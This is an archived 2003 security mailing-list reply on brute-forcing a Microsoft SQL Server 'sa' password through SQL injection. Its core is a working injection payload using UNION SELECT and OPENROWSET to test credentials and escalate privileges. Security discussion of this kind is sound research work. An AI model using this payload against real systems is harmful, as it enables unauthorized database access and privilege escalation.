Re: Brute forcing a M$ SQL Server password through SQL Injection

From: David Litchfield (mnemonixat_private)
Date: Wed Feb 19 2003 - 23:22:06 PST

Next message: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"

Previous message: Sanjiv K Agarwala: "RE: NetMeeting and H.323"
In reply to: Roman Medina: "Brute forcing a M$ SQL Server password through SQL Injection"
Next in thread: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
Reply: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
Reply: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>.....The goal is to elevate priviledges.

>How would you achieve this? ...

You need to take a look at OPENROWSET:

' UNION SELECT * FROM
OPENROWSET('SQLOLEDB','localhost';'sa';'testpass','SELECT @@version')--

Adhoc queries need to be enabled, though.

HTH,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/





----------------------------------------------------------------------------

Do you know the base address of the Global Offset Table (GOT) on a Solaris 8
box?
CORE IMPACT does.
http://www.securityfocus.com/core

Next message: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
Previous message: Sanjiv K Agarwala: "RE: NetMeeting and H.323"
In reply to: Roman Medina: "Brute forcing a M$ SQL Server password through SQL Injection"
Next in thread: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
Reply: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
Reply: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Feb 19 2003 - 15:32:19 PST